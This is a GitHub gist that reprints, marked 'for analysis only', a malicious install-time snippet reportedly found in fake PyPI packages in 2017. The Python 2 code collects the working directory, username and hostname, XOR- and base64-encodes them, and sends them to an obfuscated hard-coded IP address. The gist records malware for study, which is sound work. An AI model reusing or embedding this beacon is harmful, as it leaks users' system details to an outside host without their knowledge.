Skip to content

Instantly share code, notes, and snippets.

@HorlogeSkynet
Created September 16, 2017 13:41
Show Gist options
  • Save HorlogeSkynet/17a800aab8808bcb58766acc663b31f7 to your computer and use it in GitHub Desktop.
Save HorlogeSkynet/17a800aab8808bcb58766acc663b31f7 to your computer and use it in GitHub Desktop.
Malicious snippet from fake packages present within PyPI, from july to september 2017
#!/usr/bin/env python2
# DO NO EXECUTE THIS -- For analysis only
# Reviewed by Samuel FORESTIER
try:
import os
import pwd
import socket
import base64
soft = os.getcwd().split('/')[-1]
u = pwd.getpwuid(os.getuid()).pw_name
hname = socket.gethostname()
rawd = 'Y:%s %s %s' % (soft, u, hname)
encd = ''
t = [0x76, 0x21, 0xfe, 0xcc, 0xee]
for i in xrange(len(rawd)):
encd += chr(ord(rawd[i]) ^ t[i % len(t)])
p = ('G' + 'E' + 'T /%s ' + 'H' + 'T' + 'T' + 'P/1.1\r\n') % (
base64.b64encode(encd)) + '\r\n' * 2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
rip = 'M' + 'TIxL' + 'jQyL' + 'jIx' + 'N' + 'y4' + '0NA' + '=='
s.connect((base64.b64decode(rip), 017620))
s.sendall(p)
s.close()
except Exception, e:
# Welcome Here! :)
# just toy, no harm :)
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment